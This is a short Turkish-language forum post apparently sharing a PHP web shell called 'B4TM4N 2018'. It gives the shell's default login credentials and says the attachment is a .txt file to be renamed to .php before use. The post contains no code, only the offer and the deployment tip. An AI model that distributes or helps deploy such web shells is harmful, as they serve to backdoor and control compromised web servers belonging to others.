b4tman shell

  1. t0rrent

    B4TM4N 2018 php Shell

    user: k4mpr3t password: k4mpr3t yeni 2018 shelldir, bazı menüleri henüz tamamlanmamış olsada ilerde çok sağlam bir shell olacağı şimdiden bellidir. Kendinize göre kolayca modifiye edebilirsiniz kodlar açıktır. Shell ektedir indiriniz .txt uzantıldır siz onu .php olarak deiğiştirin.
Top Bottom